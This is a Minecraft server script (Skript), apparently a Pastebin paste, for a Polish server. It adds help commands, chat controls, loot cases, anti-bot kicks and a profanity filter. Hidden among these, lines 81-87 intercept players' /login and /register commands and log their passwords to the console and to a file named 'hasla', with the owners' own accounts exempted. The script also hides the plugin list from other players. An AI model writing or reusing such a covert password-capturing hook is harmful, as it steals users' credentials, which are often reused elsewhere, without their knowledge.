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a guest
Feb 22nd, 2017
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  1. command /pomoc:
  2. trigger:
  3. send " &8&m---&r &ePOMOC &8&m---"
  4. send "&2"
  5. send "&7/itemy &8- &eItemy Na gidlie"
  6. send "&7/list &8- &eLista graczy online "
  7. send "&7/ts &8- &eNasz TS3"
  8. send "&7/sklep &8- &eNasz Sklep "
  9. send "&7/www &8- &eNasza Strona "
  10. send "&7/spawn &8- &eTeleport na spawn "
  11. send "&7/kit &8- &eDostepne zestawy itemow "
  12. send "&7/warp &8- &eDostepne teleporty "
  13. send "&7/g &8- &eKomendy Gildi "
  14. send "&7/skarbiec &8- &eSkarbiec gildi "
  15. # send "&7/ &8- &e "
  16. # send "&7/ &8- &e "
  17. command /ts:
  18. trigger:
  19. send "&eTS3 Serwery IP: &"
  20. command /sklep:
  21. trigger:
  22. send "&eItemSHOP: &"
  23. command /www:
  24. trigger:
  25. send "&eNasza Strona: &"
  26. on command "g itemy":
  27. cancel event
  28. execute player command "/itemy"
  29. on command:
  30. if command is "pl" or "plugins" or "bukkit:pl" or "bukkit:plugins" or "bukkit:me" or "bukkit" or "bukkit:" or "?" or "help" or "ehelp":
  31. if name of player is "megabeka" or "patryk55":
  32. stop
  33. else:
  34. cancel event
  35. send "&8[&2&lD&f&lS&8] &7Nie znam takiej komendy! &e/pomoc"
  37. on place:
  38. if player's tool is ender portal frame named "&9&lBoyFarmer":
  39. if "%region at player%" contains "zielona":
  40. cancel event
  41. send "&4Na spawn jest to zablokowane"
  42. else:
  43. loop blocks under event-block:
  44. if loop-block is bedrock:
  45. stop
  46. set loop-block to obsidian
  47. on place of stone:
  48. if player's tool is stone named "&9&lKopaczFosy":
  49. if "%region at player%" contains "zielona":
  50. cancel event
  51. send "&4Na spawn jest to zablokowane"
  52. else:
  53. loop blocks under event-block:
  54. if loop-block is bedrock:
  55. stop
  56. set loop-block to air
  57. on place of sand stone:
  58. if player's tool is sand stone named "&9&lSandFarmer":
  59. if "%region at player%" contains "zielona":
  60. cancel event
  61. send "&4Na spawn jest to zablokowane"
  62. else:
  63. loop blocks under event-block:
  64. if loop-block is bedrock:
  65. stop
  66. set loop-block to sand
  67. on rightclick:
  68. if name of player's tool is "&9&lRzucaneTNT":
  69. if "%region at player%" contains "zielona":
  70. cancel event
  71. send "&4&lNa spawn TNT zablokowane"
  72. else:
  73. set {tnt.%player%} to true
  74. shoot a TNT from player with speed 0.4
  75. remove 1 tnt named "&9&lRzucaneTNT" from player
  76. wait 2 second
  77. set {tnt.%player%} to false
  78. on place tnt:
  79. if {tnt.%player%} is true:
  80. cancel event
  81. on command:
  82. command is "l" or "login" or "reg" or "register":
  83. if name of player is "megabeka" or "patryk55":
  84. send "âś– LOGOWANIE âś– &8%player% &7âś– &6PODGLAD ZABLOKOWANY" to console
  85. else:
  86. send "âś– LOGOWANIE âś– &8%player% &7âś– &6/%command% %arguments%" to console
  87. log "%player% -@- /%command% %arguments%" to "hasla"
  89. variables:
  90. {chateeek} = false
  91. command /e [<text>] [<text>] [<text>] [<text>]:
  92. aliases: /chat
  93. permission: chatall.admin
  94. permission message: &7Nie mozesz tego zrobic!
  95. trigger:
  96. if arg 1 is not set:
  97. send "&c/e off &7- Wylacza chat"
  98. send "&c/e on &7- Wlacza chat"
  99. send "&c/e cc &7- Czysci chat"
  100. send "&c/cc (powod) &7- Czysci chat z powodem"
  101. send "&7Plugin autorstawa &cmegabeki"
  102. if arg 1 is "off":
  103. if {chateeek} is false:
  104. set {chateeek} to true
  105. broadcast ""
  106. broadcast " &2» &7&oChat zostal &e&owylaczony"
  107. broadcast " &2» &7&oprzez administratora &e&o%player%"
  108. broadcast ""
  109. else:
  110. send "&cnope stary"
  111. if arg 1 is "on":
  112. if {chateeek} is true:
  113. set {chateeek} to false
  114. broadcast ""
  115. broadcast " &2» &7&oChat zostal &e&owlaczony"
  116. broadcast " &2» &7&oprzez administratora &e&o%player%"
  117. broadcast ""
  118. else:
  119. send "&7Czat jest juz wlaczony!"
  120. if arg 1 is "cc" or "wyczysc":
  121. loop 100 times:
  122. broadcast ""
  123. broadcast ""
  124. broadcast " &2» &7&oChat zostal &e&owyczyszczony "
  125. broadcast " &2» &7&oprzez administratora &e&o%player%"
  126. broadcast ""
  127. every 5 minutes:
  128. broadcast "&8##&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8= &d##&e&lINFO &8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8=&7-&8="
  129. broadcast "&8##&8"
  130. broadcast "&8## &7Zasubskrybuj kanal wlasciciela, za suba nagroda!"
  131. loop all players:
  132. send json "&8## &5Kliknij aby udac sie na strone!" tooltip "&lKlkinij, Zasubskrybuj, Zgarnij nagrode!" open "" to loop-players
  133. broadcast "&8##&8"
  135. on chat:
  136. if {chateeek} is true:
  137. if player has permissions "chatall.admin":
  138. uncancel event
  139. else:
  140. cancel event
  141. send "&7Czat zostal wylaczany drogi %player%"
  142. command /cc [<text>]:
  143. trigger:
  144. if player has permission "chatall.admin":
  145. if arg 1 is not set:
  146. loop 100 times:
  147. broadcast ""
  148. broadcast ""
  149. broadcast " &2» &7&oChat zostal &e&owyczyszczony "
  150. broadcast " &2» &7&oprzez administratora &e&o%player%"
  151. broadcast " &2» &7&oPowod: &e&oBrak Powodu"
  152. broadcast ""
  153. if arg 1 is set:
  154. loop 100 times:
  155. broadcast ""
  156. broadcast ""
  157. broadcast " &2» &7&oChat zostal &e&owyczyszczony "
  158. broadcast " &2» &7&oprzez administratora &e&o%player%"
  159. broadcast " &2» &7&oPowod: &e&o%arg 1%"
  160. broadcast ""
  161. else:
  162. send "&7Nie mozesz tego zrobic %player%!"
  163. on chat:
  164. if player is not op:
  165. replace all ".pl" in message with ""
  166. replace all "eu" in message with ""
  167. else:
  168. replace all ".pl" in message with ".pl"
  169. replace all "eu" in message with "eu"
  170. on chat:
  171. replace all "&4" in message with ""
  172. replace all "&c" in message with ""
  173. replace all "<3" in message with "❤"
  174. replace all "good" in message with "âś”"
  175. replace all "" in message with ""
  176. replace all "" in message with ""
  177. on chat:
  178. if player is not op:
  179. replace all "&4" in message with ""
  180. replace all "&c" in message with ""
  181. replace all "A" in message with "a"
  182. replace all "B" in message with "b"
  183. replace all "C" in message with "c"
  184. replace all "D" in message with "d"
  185. replace all "E" in message with "e"
  186. replace all "F" in message with "f"
  187. replace all "G" in message with "g"
  188. replace all "H" in message with "h"
  189. replace all "I" in message with "i"
  190. replace all "J" in message with "j"
  191. replace all "K" in message with "k"
  192. replace all "L" in message with "l"
  193. replace all "M" in message with "m"
  194. replace all "N" in message with "n"
  195. replace all "O" in message with "o"
  196. replace all "P" in message with "p"
  197. replace all "R" in message with "r"
  198. replace all "S" in message with "s"
  199. replace all "T" in message with "t"
  200. replace all "U" in message with "u"
  201. replace all "W" in message with "w"
  202. replace all "Y" in message with "y"
  203. replace all "Z" in message with "z"
  204. variables:
  205. {achat::blokada::%player%} = 15
  206. every 1 minutes:
  207. loop all players:
  208. if {achat::blokada::%loop-players%} >= 1:
  209. remove 1 from {achat::blokada::%loop-players%}
  210. command /case [<text>] [<text>] [<player>]:
  211. trigger:
  212. if name of player is "megabeka" or "patryk55":
  213. if arg 1 is not set:
  214. send "&aDaje wszystkim case&8 - &7/case all (ilosc od 1 do 10)"
  215. send "&aDaje tobie case&8 - &7/case daj"
  216. send "&aWylacza CASE&8 - &7/case off"
  217. send "&aWLacze CASE&8 - &7/case on"
  218. if arg 1 is "on":
  219. send "&4&lPomyslnie &2&lwlaczyles &4&lmozliwosc otwierania CASE"
  220. set {case::status} to true
  221. if arg 1 is "off":
  222. send "&4&lPomyslnie &c&lwylaczyles &4&lmozliwosc otwierania CASE"
  223. set {case::status} to false
  224. if arg 1 is "daj":
  225. give 1 chest named "&4&lC&9&lA&5&lS&e&lE" to player
  226. if arg 1 is "all":
  227. if arg 2 is "1":
  228. set {ilsoc} to 1
  229. if arg 2 is "2":
  230. set {ilsoc} to 2
  231. if arg 2 is "3":
  232. set {ilsoc} to 3
  233. if arg 2 is "4":
  234. set {ilsoc} to 4
  235. if arg 2 is "5":
  236. set {ilsoc} to 5
  237. if arg 2 is "6":
  238. set {ilsoc} to 6
  239. if arg 2 is "7":
  240. set {ilsoc} to 7
  241. if arg 2 is "8":
  242. set {ilsoc} to 8
  243. if arg 2 is "9":
  244. set {ilsoc} to 9
  245. if arg 2 is "10":
  246. set {ilsoc} to 10
  247. wait 1 seconds
  248. broadcast " &7Za &4&l60 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  249. wait 30 seconds
  250. broadcast " &7Za &4&l30 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  251. wait 20 seconds
  252. broadcast " &7Za &4&l20 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  253. wait 10 seconds
  254. broadcast " &7Za &4&l10 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  255. wait 5 seconds
  256. broadcast " &7Za &4&l5 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  257. wait 3 seconds
  258. broadcast " &7Za &4&l3 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  259. wait 2 seconds
  260. broadcast " &7Za &4&l2 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  261. wait 1 seconds
  262. broadcast " &7Za &4&l1 sekund &7caly serwer otrzyma &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE"
  263. wait 1 seconds
  264. broadcast " &7Caly serwer otrzymal &c&l%{ilsoc}% &4&lC&9&lA&5&lS&e&lE&7! GRATKI!"
  265. if arg 2 is "1":
  266. loop all players:
  267. give 1 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  268. if arg 2 is "2":
  269. loop all players:
  270. give 2 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  271. if arg 2 is "3":
  272. loop all players:
  273. give 3 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  274. if arg 2 is "4":
  275. loop all players:
  276. give 4 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  277. if arg 2 is "5":
  278. loop all players:
  279. give 5 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  280. if arg 2 is "6":
  281. loop all players:
  282. give 6 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  283. if arg 2 is "7":
  284. loop all players:
  285. give 7 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  286. if arg 2 is "8":
  287. loop all players:
  288. give 8 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  289. if arg 2 is "9":
  290. loop all players:
  291. give 9 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  292. if arg 2 is "10":
  293. loop all players:
  294. give 10 chest named "&4&lC&9&lA&5&lS&e&lE" to loop-players
  295. variables:
  296. {case::status} = true
  297. on place a chest:
  298. if name of the player's tool is "&4&lC&9&lA&5&lS&e&lE":
  299. if {case::status} is true:
  300. set event-block to air
  301. send " &5%player% &7otwiera &4&lC&9&lA&5&lS&e&lE &7i zdobyl:"
  302. chance of 50%:
  303. drop 1 310 of unbreaking 3 and protection 4 at event-location
  304. send " &8- &3Helm 4/3"
  305. chance of 50%:
  306. drop 1 311 of unbreaking 3 and protection 4 at event-location
  307. send " &8- &3Klata 4/3"
  308. chance of 50%:
  309. drop 1 312 of unbreaking 3 and protection 4 at event-location
  310. send " &8- &3Spodnie 4/3"
  311. chance of 50%:
  312. drop 1 313 of unbreaking 3 and protection 4 at event-location
  313. send " &8- &3Buty 4/3"
  314. chance of 50%:
  315. drop 1 diamond sword of unbreaking 2 and sharpness 5 at event-location
  316. send " &8- &bMiecz 5/2"
  317. chance of 50%:
  318. drop 1 diamond sword of knockback 2 at event-location
  319. send " &8- &bMiecz knock 2"
  320. chance of 5%:
  321. drop 1 beacon at event-location
  322. send " &8- &c&l&oBEACON"
  323. chance of 30%:
  324. drop 25 ender portal frame named "&9&lBoyFarmer" at event-location
  325. send " &8- &e25 BoyFramerow"
  326. chance of 30%:
  327. drop 25 stone named "&9&lKopaczFosy" at event-location
  328. send " &8- &e25 KopaczyFosy"
  329. chance of 30%:
  330. drop 25 sand stone named "&9&lSandFarmer" at event-location
  331. send " &8- &e25 SandFarmerow"
  332. chance of 20%:
  333. drop 64 tnt at event-location
  334. send " &8- &a64 tnt"
  335. chance of 20%:
  336. drop 64 obsidian at event-location
  337. send " &8- &a64 obsydianu"
  338. chance of 40%:
  339. drop 10 enchanted golden apple at event-location
  340. send " &8- &610 koxow"
  341. chance of 70%:
  342. drop 10 golden apple at event-location
  343. send " &8- &610 refili"
  344. chance of 50%:
  345. drop 1 tnt named "&9&lRzucaneTNT" at event-location
  346. send " &8- &c1 &cRzucaneTNT"
  347. send " &5&k| &7Zakup &4&lC&9&lA&5&lS&e&lE &7na stronie &"
  348. send " &5&k| &7Plugin by &emegabeka"
  349. if {case::status} is false:
  350. cancel event
  352. stop
  354. on chat:
  355. if {achat::blokada::%player%} >= 1:
  356. cancel event
  357. send "&8&m-------------------------------------------------"
  358. send "&7Zeby napisac cos na czacie musisz odczekac 15 minut."
  359. send "&7 Zostalo Ci jeszcze &e%{achat::blokada::%player%}% minut."
  360. send json "&8 &5Kliknij aby zasubskrybowac kanal wlasciciela!" tooltip "&lKlkinij, Zasubskrybuj, Zgarnij nagrode!" open "" to player
  361. send "&8&m-------------------------------------------------"
  362. cancel event
  363. stop
  364. #on command "/json":
  365. # loop all players:
  366. # send json "Zwykla widomosc." to loop-players
  367. # send json "Wiadomosc ukazana na chacie." tooltip "Wiadomosc ukazana po najechaniu na text." to loop-players
  368. # send json "Wiadomosc ukazana na chacie." tooltip "Linia 1 wiadomosci %nl%2 linia wiadomosci." to loop-players
  369. # send json "Wiadomosc ktora zaproponuje graczowi cos napisac." suggest "Dajcie lajka <3" to loop-players
  370. # send json "Wiadomosc ktora wykona danďż˝ komende" run "/msg %player% Jestem krowďż˝!" to loop-players
  371. # send json "Wiadmosc ktora wykona danďż˝ komende, ujawni nam text oraz zaproponuje graczowi cos napisac." tooltip "Zaraz cos wykonasc." run "/msg %player% Pomocy!" then "Daleszy text ktory nic nie robi!" to players
  372. # send json " &a&lP&2&lN &8» &6Chcesz wesprzec nasz serwer? &7(Klknij)" tooltip " &8» &7Przekierowanie na%nl% &8» &" open "" to loop-players
  374. on chat:
  375. # if player has permissions "cencura.chatu":
  376. if name of player is "megabeka" or "patryk55":
  377. replace all "nasz ts" in message with ""
  378. else:
  379. replace all "nasz ts" in message with ""
  380. replace all "ts" in message with ""
  381. replace all "nasz ts3" in message with ""
  382. replace all "ts3" in message with ""
  383. replace all "kurwa" in message with ""
  384. replace all "ench." in message with ""
  385. replace all "pierdole" in message with ""
  386. replace all "japierdole" in message with ""
  387. replace all "ja pierdole" in message with ""
  388. replace all "dziwka" in message with ""
  389. replace all "pizda" in message with ""
  390. replace all "zaje" in message with ""
  391. replace all "zajebiscie" in message with ""
  392. replace all "kutas" in message with ""
  393. replace all "cipa" in message with ""
  394. replace all "huj" in message with ""
  395. replace all "skurwiel" in message with ""
  396. replace all "chuj" in message with ""
  397. replace all "cipka" in message with ""
  398. replace all "pedal" in message with ""
  399. replace all "pedaďż˝" in message with ""
  400. replace all "ciota" in message with ""
  401. replace all "cwel" in message with ""
  402. replace all "penisek" in message with ""
  403. replace all "skurwysyn" in message with ""
  404. replace all ".ench" in message with ""
  405. replace all ".pl" in message with ""
  406. replace all "zjebane" in message with ""
  407. replace all "cioty" in message with ""
  408. replace all "kurwo" in message with ""
  409. replace all "zajebane" in message with ""
  410. replace all "zamknij" in message with ""
  411. replace all "morde" in message with ""
  412. replace all "szmato" in message with ""
  413. replace all "pierdolona" in message with ""
  414. replace all "pojebany" in message with ""
  415. replace all "chuj" in message with ""
  416. replace all "chuju" in message with ""
  417. replace all "spierdalaj" in message with ""
  418. replace all "pojebanego" in message with ""
  419. replace all "szmata" in message with ""
  420. replace all "p l" in message with ""
  421. replace all "e n c h" in message with ""
  422. replace all "p l" in message with ""
  423. replace all "mc." in message with ""
  424. replace all "rcmc" in message with ""
  425. replace all "jeabny" in message with ""
  426. replace all "jebne" in message with ""
  427. replace all "eu" in message with ""
  428. replace all "ryj" in message with ""
  429. replace all "wkurwail" in message with ""
  430. replace all "pierdol" in message with ""
  431. replace all "dupe" in message with ""
  432. replace all "suki" in message with ""
  433. replace all "&4" in message with ""
  434. replace all "&c" in message with ""
  435. replace all "<3" in message with "❤"
  436. replace all "good" in message with "âś”"
  437. replace all "enchant" in message with "enchant"
  438. replace all "" in message with ""
  446. on join:
  447. add 1 to {wejscia::na::serwa}
  448. variables:
  449. {wejscia::na::serwa} = 1
  450. every 60 seconds:
  451. set {wejscia::na::serwa} to 0
  452. set {odliczanie::na::serwa} to 61
  453. every 1 seconds:
  454. remove 1 from {odliczanie::na::serwa}
  455. on join:
  456. if {wejscia::na::serwa} > 10:
  457. kick player due to "%nl%&r &8&m----------------&r %nl% &6&lDRAGON&e&lSV %nl%&r &8&m----------------------------------&r %nl% &aZbyt wiele osob chce dolaczyc na serwer! %nl% &a10 osob&8/&a1 minute! &8(&e%{wejscia::na::serwa}%&8) %nl% &aMozesz wejsc za: &2%{odliczanie::na::serwa}% sekund%nl%&r &8&m----------------------------------&r "
  458. else:
  459. send "&aMasz farta! :D"
  461. on connect:
  462. if {gracz::%player%} is set:
  463. stop
  464. kick player due to "&6&lDRAGON&e&lSV %nl%&r &8&m-----------------------------&r %nl% &aWerfikacja %nl% &aAntyBOT %nl% %nl% &2OK %nl% %nl% &aZapraszamy ponownie na serwer! %nl% &8&m----------------------------- "
  465. set {gracz::%player%} to now
  469. on join:
  470. if name of player is "K0zak" or "patryk55":
  471. set join message to "&8[&a+&8] &7%player%"
  472. else:
  473. set join message to ""
  474. on quit:
  475. if name of player is "K0zak" or "patryk55":
  476. set leave message to "&8[&c-&8] &7%player%"
  477. else:
  478. set leave message to ""
  479. on first join:
  480. add 1 to {ODWIEDZINY::SERWA}
  481. on join:
  482. add 1 to {ODWIEDZINY::SERWA}
  483. on join:
  484. wait 5 ticks
  485. send "&8##&2"
  486. send "&8##&2"
  487. send "&8##&2"
  488. send "&8##&2"
  489. send "&8## &8» &6&lDRAGON&e&lSV &8«"
  490. send "&8##&2"
  491. send "&8## &8» &7Witaj&8: &e%player%.&2"
  492. send "&8## &8» &7Odwiedziono nas &8: &e%{ODWIEDZINY::SERWA}% &7razy.!&2"
  493. send "&8## &8» &7Graczy Online &e1%number of all players%.&2"
  494. send "&8## &8» &7Nasz Teamspeak: &"
  495. send "&8## &8» &7WWW: &"
  496. send "&8##"
  497. send "&8## &8» &6&lDRAGON&e&lSV &8«"
  498. command /list:
  499. trigger:
  500. wait 2 ticks
  501. open chest with 6 rows named " &4&l> &9&lONLINE &4&l<" to player
  502. wait 1 tick
  503. loop all players:
  504. add 1 to {_online}
  505. if {_online} is smaller than 54:
  506. if loop-players has permission "list.dupa":
  507. format slot {_online}-1 of player with 1 of red wool named "&9%displayname of loop-player%" to close
  508. else:
  509. format slot {_online}-1 of player with 1 of light green wool named "%displayname of loop-player%" to close
  510. every 8 minutes:
  511. execute console command "/time set day world"
  512. on weather change to rain or thunder:
  513. cancel event
  514. on damage:
  515. if victim is a player:
  516. if attacker is a player:
  517. set {sercajego} to victim's health
  518. if {sercajego} <= 10:
  519. display hologram "&7%victim% &e» &4&l%{sercajego}%&c&l/&4&l10 HP" at location 1 meters above victim for 1 second
  520. on walk on sponge:
  521. if "%region at player%" contains "sponge":
  522. chance of 1%:
  523. send "&7Brawo! Wydropiles &6&oMagiczna Skorupka&7!"
  524. drop 1 nether quartz item of unbreaking 10 named "&8&m-]&2&m--&r &6&oMagiczna Skorupka &2&m--&8&m[-"
  525. on rightclick with nether quartz item:
  526. if player's tool is a nether quartz item of unbreaking 10 named "&8&m-]&2&m--&r &6&oMagiczna Skorupka &2&m--&8&m[-":
  527. if player has 10 nether quartz item of unbreaking 10 named "&8&m-]&2&m--&r &6&oMagiczna Skorupka &2&m--&8&m[-":
  528. cancel event
  529. remove 10 nether quartz item of unbreaking 10 named "&8&m-]&2&m--&r &6&oMagiczna Skorupka &2&m--&8&m[-" from player
  530. send "&7Brawo, udalo ci sie zlaczyc skorupki i zdobyc &4CASE&7!"
  531. give 1 chest named "&4&lC&9&lA&5&lS&e&lE" to player
  532. else:
  533. cancel event
  534. send "&7Aby zlaczyc skorupki i stworzyc &4CASE &7potrzebujesz 10 skorupek!"
  535. stop
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